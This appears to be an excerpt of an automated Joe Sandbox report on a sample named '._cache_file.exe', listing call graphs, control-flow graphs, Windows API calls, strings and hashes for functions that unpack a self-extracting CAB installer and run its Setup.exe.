                                                                                              callgraph 0 Function_01003D02 74 Function_01003892 0->74 112 Function_01003BE7 0->112 123 Function_010062FF 0->123 1 Function_01007A04 115 Function_01007AF2 1->115 2 Function_01008906 3 Function_01009507 43 Function_0100815F 3->43 48 Function_01009769 3->48 4 Function_01002D09 85 Function_01002CAE 4->85 5 Function_0100370B 6 Function_0100750B 26 Function_01006D3D 6->26 30 Function_01007241 6->30 45 Function_01007463 6->45 7 Function_0100360C 94 Function_010060BE 7->94 97 Function_01002BC4 7->97 119 Function_010061F9 7->119 7->123 8 Function_01007E0D 8->3 14 Function_0100821C 8->14 20 Function_01008038 8->20 21 Function_01009438 8->21 8->43 47 Function_01009064 8->47 67 Function_0100818B 8->67 88 Function_010088B4 8->88 100 Function_010090C9 8->100 9 Function_0100400D 13 Function_01003016 9->13 23 Function_01003E3A 9->23 24 Function_01002F3A 9->24 9->74 10 Function_01003C0F 10->74 11 Function_01006010 51 Function_01005F6E 11->51 11->123 12 Function_01002B13 12->123 110 Function_01002FE1 13->110 13->123 15 Function_0100911E 41 Function_01009558 15->41 15->43 81 Function_010080A3 15->81 15->123 16 Function_01006621 17 Function_01002821 18 Function_01002C2E 19 Function_01007D30 21->15 21->41 22 Function_01007339 22->30 76 Function_01006F96 22->76 87 Function_010078B4 22->87 114 Function_01006EF2 22->114 23->112 25 Function_0100373C 42 Function_01007A59 26->42 66 Function_0100378B 26->66 26->87 27 Function_0100673E 40 Function_01003C58 27->40 27->87 28 Function_0100453F 84 Function_010044AD 28->84 29 Function_01003941 29->74 32 Function_01006F44 30->32 30->40 59 Function_01002C7C 30->59 30->87 31 Function_01007942 39 Function_01007B55 31->39 53 Function_01006B75 32->53 32->87 120 Function_01006AFC 32->120 33 Function_01007D48 33->123 34 Function_01006A49 34->59 34->87 35 Function_01002C4B 36 Function_0100654B 37 Function_01007C51 38 Function_01002E53 55 Function_01002D78 38->55 99 Function_01007AC6 39->99 103 Function_01007BCE 39->103 40->74 42->99 43->81 44 Function_0100655F 116 Function_010065F3 44->116 45->22 58 Function_0100687B 45->58 83 Function_01006DA8 45->83 45->87 46 Function_01006663 47->2 98 Function_01008CC5 47->98 48->123 49 Function_01004F6B 49->0 49->12 49->23 60 Function_0100447F 49->60 71 Function_01004590 49->71 49->74 49->84 49->85 96 Function_010029C2 49->96 49->97 108 Function_010028D9 49->108 49->112 113 Function_010045EB 49->113 49->123 50 Function_0100346E 109 Function_010033DB 50->109 118 Function_01005EF7 51->118 52 Function_01003972 52->50 65 Function_0100358B 52->65 73 Function_01003791 52->73 117 Function_010034F4 52->117 52->123 53->31 62 Function_01003783 53->62 53->87 53->112 54 Function_01007575 54->6 54->45 54->49 64 Function_01003C87 54->64 54->87 56 Function_01002779 57 Function_01003E7A 57->23 57->123 58->40 58->87 107 Function_010078D7 58->107 60->23 60->112 61 Function_01007A7F 89 Function_01007AB6 61->89 63 Function_01008286 64->74 65->50 68 Function_0100628C 69 Function_0100618D 70 Function_0100608F 70->11 104 Function_01005ECE 70->104 71->60 72 Function_01005F91 72->51 72->118 72->123 73->56 74->4 74->50 74->55 75 Function_01008093 76->10 76->16 76->40 76->59 76->87 92 Function_01006EBA 76->92 93 Function_010069BB 76->93 105 Function_010067D1 76->105 77 Function_01005899 77->9 77->10 77->17 77->27 77->29 77->49 77->52 77->55 77->74 82 Function_010066A7 77->82 86 Function_01002FB2 77->86 91 Function_010046B9 77->91 95 Function_010037BF 77->95 77->97 101 Function_010076CB 77->101 102 Function_010027CB 77->102 77->112 78 Function_01005E9C 79 Function_0100859D 80 Function_010065A1 82->87 83->1 83->66 83->87 84->60 85->123 88->63 88->79 90 Function_010065B8 91->5 91->7 91->23 91->25 91->28 91->60 91->69 91->70 91->71 91->84 91->94 91->97 106 Function_010061D3 91->106 91->119 91->123 92->16 92->46 93->59 93->87 95->97 96->123 99->19 99->37 111 Function_01007CE1 99->111 100->33 101->16 101->34 101->49 101->54 101->76 101->87 101->114 102->123 103->112 104->78 105->87 106->70 106->72 108->123 112->74 113->71 113->123 114->40 114->87 114->93 115->8 115->75 117->50 118->104 119->70 119->94 119->106 119->123 120->61 120->66 120->87 121 Function_010035FC 122 Function_010063FF 122->62 122->80 122->90 122->116

                                                                                              Executed Functions

                                                                                              Function 01005899 Relevance: 91.4, APIs: 42, Strings: 10, Instructions: 429memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 1005899-1005903 InitializeCriticalSectionAndSpinCount #17 GetProcessHeap call 1002fb2 CreateEventA 3 1005905-1005907 0->3 4 100590c-1005917 call 100400d 0->4 5 1005e65 call 1003892 3->5 10 1005960-1005980 CreateEventA CreateThread 4->10 11 1005919-1005920 call 10027cb 4->11 9 1005e6a-1005e70 5->9 12 1005e72-1005e7d DeleteCriticalSection 9->12 13 1005e83-1005e86 ExitProcess 9->13 15 1005982-1005984 10->15 16 1005989-100599e WaitForSingleObject 10->16 22 1005922-1005927 11->22 23 100592c-100593b 11->23 12->13 15->5 17 10059a0-10059a5 16->17 18 10059aa-10059b6 16->18 17->5 20 10059e4-1005a23 SendDlgItemMessageA * 3 18->20 21 10059b8-10059e2 Sleep ShowWindow SetParent 18->21 24 1005a25-1005a2b 20->24 21->24 22->5 25 1005947-100594d 23->25 26 100593d-1005942 23->26 27 1005a96-1005aa6 call 1004f6b 24->27 28 1005a2d-1005a7b call 1003c0f call 10066a7 call 100673e 24->28 29 1005959 25->29 30 100594f 25->30 26->5 35 1005b98-1005bc5 call 1002bc4 CreateFileA 27->35 36 1005aac-1005ab2 27->36 28->26 49 1005a81-1005a87 28->49 29->10 30->29 35->26 47 1005bcb-1005be7 GetFileSize call 1003be7 35->47 38 1005b53-1005b68 call 10076cb 36->38 39 1005ab8-1005b4d LoadStringA * 2 SendDlgItemMessageA * 5 ShowWindow 36->39 45 1005b6d-1005b72 38->45 39->38 45->26 48 1005b78-1005b7e 45->48 55 1005be9-1005c00 ReadFile 47->55 56 1005c1f-1005c2e CloseHandle 47->56 51 1005b80-1005b86 48->51 52 1005b8c-1005b92 48->52 49->27 53 1005a89-1005a90 ShowWindow 49->53 51->17 51->52 52->35 57 1005c3b-1005c41 52->57 53->27 55->56 58 1005c02-1005c0a 55->58 56->26 59 1005c34-1005c35 DeleteFileA 56->59 60 1005c43-1005c49 57->60 61 1005c5e-1005c64 57->61 58->56 62 1005c0c-1005c1c 58->62 59->57 60->61 63 1005c4b-1005c51 call 10046b9 60->63 64 1005dd6-1005ddc 61->64 65 1005c6a-1005c70 61->65 62->56 71 1005c56-1005c58 63->71 66 1005e15-1005e1c 64->66 67 1005dde-1005e0f ShowWindow LoadStringA MessageBoxA 64->67 65->64 69 1005c76-1005c7c 65->69 66->9 70 1005e1e-1005e25 66->70 67->66 72 1005c91-1005cc8 SetEnvironmentVariableA * 3 call 10037bf 69->72 73 1005c7e-1005c8f SendDlgItemMessageA 69->73 74 1005e60 70->74 75 1005e27-1005e53 call 1003972 70->75 71->26 71->61 79 1005cf5-1005d01 72->79 80 1005cca-1005ce6 ExpandEnvironmentStringsA 72->80 73->72 74->5 84 1005e55-1005e57 75->84 85 1005e5c-1005e5e 75->85 83 1005d03-1005d0b 79->83 80->3 82 1005cec-1005cee 80->82 86 1005cf0 82->86 87 1005d36-1005d7a CreateProcessA 82->87 83->83 88 1005d0d-1005d12 83->88 84->85 85->9 85->74 86->3 87->3 90 1005d80-1005d86 87->90 89 1005d14-1005d19 88->89 89->89 91 1005d1b-1005d1d 89->91 92 1005d95-1005dc8 WaitForSingleObject GetExitCodeProcess CloseHandle call 1002821 90->92 93 1005d88-1005d8f ShowWindow 90->93 94 1005d1e-1005d24 91->94 98 1005dca-1005dcd 92->98 99 1005dcf-1005dd4 call 1002d78 92->99 93->92 94->94 97 1005d26-1005d34 94->97 97->87 98->66 99->66
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0100D060,000000FF), ref: 010058CB
                                                                                              • #17.COMCTL32 ref: 010058DA
                                                                                              • GetProcessHeap.KERNEL32 ref: 010058E0
                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 010058FA
                                                                                              • DeleteCriticalSection.KERNEL32(0100D060,20000001), ref: 01005E77
                                                                                              • ExitProcess.KERNEL32 ref: 01005E86
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalProcessSection$CountCreateDeleteEventExitHeapInitializeSpin
                                                                                              • String ID: C:\Users\user\Desktop\._cache_file.exe$D$Extracting File:$To Directory:$_SFX_CAB_EXE_PACKAGE$_SFX_CAB_EXE_PARAMETERS$_SFX_CAB_EXE_PATH$_sfx_manifest_$c:\36a8a8e2fed651ec27d1eed188bb35$c:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe
                                                                                              • API String ID: 2862019026-1487908168
                                                                                              • Opcode ID: c3a792d8c2075a35dd7e64b05d9c3b2f4654ac4543c79ca2ca3d8c026a3f3d64
                                                                                              • Instruction ID: c7a1a7c6920ba9a6fd8a3830312b28b74cc00901af42d7916e2ca50266dc036a
                                                                                              • Opcode Fuzzy Hash: c3a792d8c2075a35dd7e64b05d9c3b2f4654ac4543c79ca2ca3d8c026a3f3d64
                                                                                              • Instruction Fuzzy Hash: 06E18070540245BFFB339BA49E89F6A3BA9F705754F1042AAF2C1A50D9DBBA4C40CF61
                                                                                              Function 01004F6B Relevance: 77.6, APIs: 35, Strings: 9, Instructions: 646timestringencryptionCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 010045EB: GetFileAttributesA.KERNELBASE(?), ref: 0100465E
                                                                                                • Part of subcall function 010045EB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 01004672
                                                                                                • Part of subcall function 010045EB: GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 01004682
                                                                                                • Part of subcall function 010045EB: DecryptFileA.ADVAPI32(?,00000000), ref: 01004695
                                                                                                • Part of subcall function 010045EB: GetLastError.KERNEL32 ref: 0100469B
                                                                                              • InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,?,?,?), ref: 0100502A
                                                                                              • InitializeAcl.ADVAPI32(?,00000100,00000002,?,?,?,?,?), ref: 01005046
                                                                                              • AddAccessAllowedAce.ADVAPI32(?,00000002,10000000,?,?,?,?,?,?), ref: 0100506B
                                                                                              • AddAccessAllowedAce.ADVAPI32(?,00000002,10000000,?,?,?,?,?,?), ref: 01005081
                                                                                              • AddAccessAllowedAce.ADVAPI32(?,00000002,10000000,?,?,?,?,?,?), ref: 01005097
                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,?,?,?,?), ref: 010050AB
                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,c:\36a8a8e2fed651ec27d1eed188bb35,?,?,?,?,?), ref: 010050DB
                                                                                              • GetSystemDirectoryA.KERNEL32(c:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe ,0000FFFF), ref: 010050F0
                                                                                              • QueryDosDeviceA.KERNEL32(c:\,?,00000400), ref: 01005146
                                                                                              • _strlwr.MSVCRT ref: 01005162
                                                                                              • strstr.MSVCRT ref: 0100517C
                                                                                              • strstr.MSVCRT ref: 01005190
                                                                                              • GetDiskFreeSpaceA.KERNELBASE(005C3A63,?,?,?,?,?,?,?), ref: 010051E8
                                                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,?,?,?), ref: 01005357
                                                                                              • CryptGenRandom.ADVAPI32(?,00000010,?,?,?,?,?,?), ref: 01005388
                                                                                              • sprintf.MSVCRT ref: 0100539F
                                                                                              • sprintf.MSVCRT ref: 010053D7
                                                                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?), ref: 0100544B
                                                                                              • GetSystemTime.KERNEL32(?,?,?,?,?,?), ref: 0100547A
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?), ref: 0100548E
                                                                                              • DialogBoxParamA.USER32(0000006B,Function_00003E7A,00000000,?,00000000), ref: 01005501
                                                                                              • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 01005601
                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,cc:\), ref: 01005615
                                                                                              • SetFileTime.KERNELBASE(DADAFEED,?,?,?,?,00000000,cc:\), ref: 01005627
                                                                                              • CloseHandle.KERNELBASE(DADAFEED,?,00000000,cc:\), ref: 01005630
                                                                                              • SendDlgItemMessageA.USER32(0002041E,0000006A,00000405,00000000,00000000), ref: 01005661
                                                                                              • MoveFileExA.KERNEL32(0100C3A0,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 01005692
                                                                                              • strstr.MSVCRT ref: 0100571A
                                                                                              • _stricmp.MSVCRT(?,_sfx_manifest_,?,00000000,cc:\), ref: 01005742
                                                                                              • SendDlgItemMessageA.USER32(0002041E,00000068,0000000C,00000000,?), ref: 010057A7
                                                                                              • GetLastError.KERNEL32(?,00000000,cc:\), ref: 010057E4
                                                                                                • Part of subcall function 01004590: CreateDirectoryA.KERNELBASE(?,?), ref: 010045B8
                                                                                              • CreateFileA.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,00000000,cc:\), ref: 0100584D
                                                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,00000000,?,00000000,cc:\), ref: 01005865
                                                                                              • SetEndOfFile.KERNELBASE(00000000,?,00000000,cc:\), ref: 01005868
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,cc:\), ref: 01005872
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Time$AccessAllowedCryptDirectorySystemstrstr$ContextCreateDescriptorErrorInitializeItemLastMessagePointerSecuritySendsprintf$AcquireAddressAttributesCloseCurrentDaclDateDecryptDeviceDialogDiskFreeHandleLibraryLoadLocalMoveParamProcQueryRandomReleaseSpace_stricmp_strlwr
                                                                                              • String ID: %02x$_sfx_manifest_$c:\36a8a8e2fed651ec27d1eed188bb35$c:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe $ccc:\$cdtag.1$harddisk$ramdisk$temp\ext
                                                                                              • API String ID: 1990338833-1726978998
                                                                                              • Opcode ID: fc543d989388e90af9c16f5f6d5131e38cd47ae6136f058cfd03532917dbfc3f
                                                                                              • Instruction ID: cb34d6e19b9d76d7dc8cc1b05be71e2c05cbe8c8c636e12e1b2dadafe6b93270
                                                                                              • Opcode Fuzzy Hash: fc543d989388e90af9c16f5f6d5131e38cd47ae6136f058cfd03532917dbfc3f
                                                                                              • Instruction Fuzzy Hash: 6232A1719006589FFB73DB689C48BEA7BB9AB05346F0041E6E6C9E21C1DB758AC4CF50
                                                                                              Function 010046B9 Relevance: 68.9, APIs: 30, Strings: 9, Instructions: 611filestringwindowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 286 10046b9-10046f0 call 10061d3 289 10048fc-1004900 286->289 290 10046f5-1004710 call 10060be 289->290 291 1004906-1004923 call 10061d3 289->291 298 1004716-100471c 290->298 299 10048e9-10048f7 call 100608f 290->299 296 1004ae3-1004afb call 10061d3 291->296 297 1004929 291->297 310 1004b01 296->310 311 1004cac-1004cc2 call 100370b call 10061d3 296->311 301 100492f-100494f call 10060be 297->301 302 1004736-1004764 call 1002bc4 call 10060be 298->302 303 100471e-1004730 SendDlgItemMessageA 298->303 299->289 313 1004955-100495b 301->313 314 1004ab9-1004add call 100608f 301->314 302->299 327 100476a-1004798 call 1002bc4 call 10060be 302->327 303->302 316 1004b08-1004b2d call 10060be 310->316 337 1004e14-1004e1c 311->337 319 1004975-10049a8 call 1002bc4 call 10060be 313->319 320 100495d-100496f SendDlgItemMessageA 313->320 314->296 314->301 328 1004c82-1004ca6 call 100608f 316->328 329 1004b33-1004b39 316->329 319->314 345 10049ae-10049dc call 1002bc4 strstr 319->345 320->319 353 10047b4 327->353 354 100479a-10047b2 call 1002bc4 327->354 328->311 347 1004b03 328->347 335 1004b53-1004b82 call 1002bc4 call 10060be 329->335 336 1004b3b-1004b4d SendDlgItemMessageA 329->336 335->328 369 1004b88-1004bc8 _strlwr call 100360c 335->369 336->335 343 1004e22-1004e3f call 10061f9 337->343 344 1004cc7-1004cdd call 10060be 337->344 357 1004e41-1004e55 call 100618d 343->357 358 1004ea8-1004ebb call 10061f9 343->358 363 1004ce3-1004d11 call 1002bc4 strstr 344->363 364 1004e08-1004e0f call 100608f 344->364 345->314 366 10049e2-1004a2c call 1004590 call 100447f SetFileAttributesA CopyFileA 345->366 347->316 361 10047ba-10047d0 strstr 353->361 354->361 357->358 379 1004e57-1004e6f strchr 357->379 383 1004f37-1004f3d 358->383 384 1004ebd-1004ed3 call 10060be 358->384 361->299 368 10047d6-1004842 call 1004590 call 100447f SetFileAttributesA call 100360c 361->368 363->364 385 1004d17-1004d34 FindFirstFileA 363->385 364->337 406 1004aa7-1004ab3 SetFileAttributesA 366->406 407 1004a2e-1004a37 GetLastError 366->407 368->299 436 1004848-1004851 GetLastError 368->436 409 1004c37-1004c4b _strlwr 369->409 410 1004bca-1004bd3 GetLastError 369->410 379->383 386 1004e75 379->386 389 1004f51-1004f63 call 10062ff 383->389 390 1004f3f-1004f4b SendDlgItemMessageA 383->390 384->383 401 1004ed5-1004f22 call 1003e3a call 1002bc4 call 1003e3a strrchr 384->401 385->364 392 1004d3a-1004d4d strrchr 385->392 395 1004e7c-1004e86 386->395 390->389 394 1004d4e-1004d55 392->394 402 1004de1-1004df6 FindNextFileA 394->402 403 1004d5b-1004d61 394->403 404 1004e77-1004e7a 395->404 405 1004e88-1004ea3 call 1003e3a 395->405 457 1004f24 401->457 458 1004f26-1004f32 call 1003e3a 401->458 402->394 416 1004dfc-1004e02 FindClose 402->416 412 1004d63-1004d75 SendDlgItemMessageA 403->412 413 1004d7b-1004d85 403->413 404->395 404->405 405->383 406->314 407->406 417 1004a39-1004a54 call 100453f 407->417 414 1004c51-1004c57 409->414 419 1004bd5-1004be4 call 10044ad 410->419 420 1004c2f-1004c35 410->420 412->413 422 1004d87-1004d8f 413->422 423 1004c73-1004c75 414->423 424 1004c59-1004c5b 414->424 416->364 417->406 441 1004a56-1004a61 417->441 419->420 437 1004be6-1004bf6 MoveFileA 419->437 420->328 420->409 422->422 431 1004d91-1004da0 DeleteFileA 422->431 435 1004c78-1004c7a 423->435 432 1004c5d-1004c65 424->432 433 1004c6f-1004c71 424->433 431->402 439 1004da2-1004dce Sleep SetFileAttributesA DeleteFileA 431->439 432->423 440 1004c67-1004c6d 432->440 433->435 435->328 442 1004c7c 435->442 436->299 443 1004857-1004876 call 100453f 436->443 437->420 444 1004bf8-1004c27 MoveFileA 437->444 439->402 446 1004dd0-1004ddc call 100447f 439->446 440->414 440->433 447 1004a63 441->447 448 1004a69-1004a71 441->448 442->328 443->299 460 1004878-1004883 443->460 444->420 461 1004c29 444->461 446->402 447->448 449 1004a73 448->449 450 1004a79-1004a9f CopyFileA call 100373c 448->450 449->450 450->406 463 1004aa1 450->463 457->458 458->383 464 1004885 460->464 465 100488b-1004891 460->465 461->420 463->406 464->465 467 1004893-1004898 465->467 468 100489a-10048aa 465->468 469 10048ac-10048e1 call 100373c 467->469 468->469 469->299 473 10048e3 469->473 473->299
                                                                                              APIs
                                                                                              • SendDlgItemMessageA.USER32(00000068,0000000C,00000000,?,00000000), ref: 01004730
                                                                                              • strstr.MSVCRT ref: 010047C6
                                                                                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 01004801
                                                                                              • GetLastError.KERNEL32 ref: 01004848
                                                                                              • SendDlgItemMessageA.USER32(00000068,0000000C,00000000,?,?), ref: 0100496F
                                                                                              • strstr.MSVCRT ref: 010049D2
                                                                                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 01004A0D
                                                                                              • CopyFileA.KERNEL32(?,?,00000000), ref: 01004A22
                                                                                              • GetLastError.KERNEL32 ref: 01004A2E
                                                                                              • CopyFileA.KERNEL32(0100CE20,0100C3A0,00000000), ref: 01004A7C
                                                                                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 01004AB3
                                                                                              • SendDlgItemMessageA.USER32(00000068,0000000C,00000000,?,?), ref: 01004B4D
                                                                                              • _strlwr.MSVCRT ref: 01004B8F
                                                                                              • GetLastError.KERNEL32 ref: 01004BCA
                                                                                              • MoveFileA.KERNEL32(?,0100CE20), ref: 01004BEE
                                                                                              • MoveFileA.KERNEL32(0100CE20,?), ref: 01004C1F
                                                                                              • _strlwr.MSVCRT ref: 01004C3E
                                                                                              • strstr.MSVCRT ref: 01004D07
                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 01004D25
                                                                                              • strrchr.MSVCRT ref: 01004D43
                                                                                              • SendDlgItemMessageA.USER32(00000068,0000000C,00000000,?), ref: 01004D75
                                                                                              • DeleteFileA.KERNEL32(?), ref: 01004D98
                                                                                              • Sleep.KERNEL32(000001F4), ref: 01004DA7
                                                                                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 01004DB9
                                                                                              • DeleteFileA.KERNEL32(?), ref: 01004DC6
                                                                                              • FindNextFileA.KERNEL32(?,00000010), ref: 01004DEE
                                                                                              • FindClose.KERNEL32(?), ref: 01004E02
                                                                                              • strchr.MSVCRT ref: 01004E60
                                                                                              • strrchr.MSVCRT ref: 01004F18
                                                                                              • SendDlgItemMessageA.USER32(00000068,0000000C,00000000,010022BB,?), ref: 01004F4B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$ItemMessageSend$Attributes$ErrorFindLaststrstr$CopyDeleteMove_strlwrstrrchr$CloseFirstNextSleepstrchr
                                                                                              • String ID: \..\$c:\36a8a8e2fed651ec27d1eed188bb35$command$copy$delete$deltas$options$run$verify
                                                                                              • API String ID: 3851170777-1313341910
                                                                                              • Opcode ID: 89faf3db3762656d20157f678ec9eb14baf6df118e99a81af9509fb5c0dc1727
                                                                                              • Instruction ID: 1687914c5463bdb562aec54404296a2838319fe0694d4148413fc6cab1dc7c20
                                                                                              • Opcode Fuzzy Hash: 89faf3db3762656d20157f678ec9eb14baf6df118e99a81af9509fb5c0dc1727
                                                                                              • Instruction Fuzzy Hash: 06224E71940219AEFB63DBA4DC48FEA77BDAB14740F0045E6E2C9E2081DB759AC4CF64
                                                                                              Function 010029C2 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 101libraryloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 655 10029c2-1002a04 GetSystemDirectoryA 656 1002a0a-1002a11 655->656 657 1002afe-1002b0d call 10062ff 655->657 659 1002a12-1002a18 656->659 659->659 661 1002a1a-1002a35 LoadLibraryA 659->661 662 1002a3b-1002a51 GetProcAddress 661->662 663 1002afc-1002afd 661->663 664 1002af5-1002af6 FreeLibrary 662->664 665 1002a57-1002a67 GetProcAddress 662->665 663->657 664->663 665->664 666 1002a6d-1002a7a GetProcAddress 665->666 667 1002af4 666->667 668 1002a7c-1002a8c GetProcAddress 666->668 667->664 668->667 669 1002a8e-1002a95 668->669 670 1002a99-1002a9b 669->670 670->667 671 1002a9d-1002aa4 670->671 671->667 672 1002aa6-1002ab1 671->672 672->667 674 1002ab3-1002adf 672->674 676 1002ae1-1002ae7 674->676 677 1002aed 674->677 676->677 677->667
                                                                                              APIs
                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000208), ref: 010029FC
                                                                                              • LoadLibraryA.KERNELBASE(?), ref: 01002A2B
                                                                                              • GetProcAddress.KERNEL32(00000000,OpenCluster), ref: 01002A47
                                                                                              • GetProcAddress.KERNEL32(00000000,CloseCluster), ref: 01002A5D
                                                                                              • GetProcAddress.KERNEL32(00000000,GetNodeClusterState), ref: 01002A74
                                                                                              • GetProcAddress.KERNEL32(00000000,GetClusterQuorumResource), ref: 01002A82
                                                                                              • FreeLibrary.KERNELBASE(00000000), ref: 01002AF6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Library$DirectoryFreeLoadSystem
                                                                                              • String ID: CloseCluster$GetClusterQuorumResource$GetNodeClusterState$OpenCluster$\clusapi.dll
                                                                                              • API String ID: 1303522615-3927317670
                                                                                              • Opcode ID: 19ecdf8b4e077f10c3230d29f80904c3b00e6bcb7b69bd1645e8ca2f298c8bba
                                                                                              • Instruction ID: 58cc90120aaaae1193b9abb678c188ec05ae692f01dcb1cc6c6543d780e01115
                                                                                              • Opcode Fuzzy Hash: 19ecdf8b4e077f10c3230d29f80904c3b00e6bcb7b69bd1645e8ca2f298c8bba
                                                                                              • Instruction Fuzzy Hash: F13147719002299BFB72DBA88D48FDA7BFC5F4A640F0442E5E544E2141DF748AC5DF61
                                                                                              Function 01003D02 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 112memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 01003D4D
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 01003D5D
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 01003D64
                                                                                              • GetTokenInformation.KERNELBASE(?,00000004,c:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe ,00010000,?), ref: 01003D8F
                                                                                              • GetLengthSid.ADVAPI32 ref: 01003DA0
                                                                                              • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),c:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe ,00010000,?), ref: 01003DE0
                                                                                              • GetLengthSid.ADVAPI32 ref: 01003DEC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: Token$InformationLengthProcess$AllocateCurrentInitializeOpen
                                                                                              • String ID: c:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe
                                                                                              • API String ID: 3439802213-1997848934
                                                                                              • Opcode ID: 39bd5e7e546647ab028321304c63e802246d0dfb69878f62c748718f95d36311
                                                                                              • Instruction ID: 50115026e131d678ab12094c5f900f2c20abbbbf56de831dd1116dd559b86531
                                                                                              • Opcode Fuzzy Hash: 39bd5e7e546647ab028321304c63e802246d0dfb69878f62c748718f95d36311
                                                                                              • Instruction Fuzzy Hash: 23315431600245AFEB17DBA8DC59BAF7BE9FB58740F044069FA81EB2C1DAB59904C760
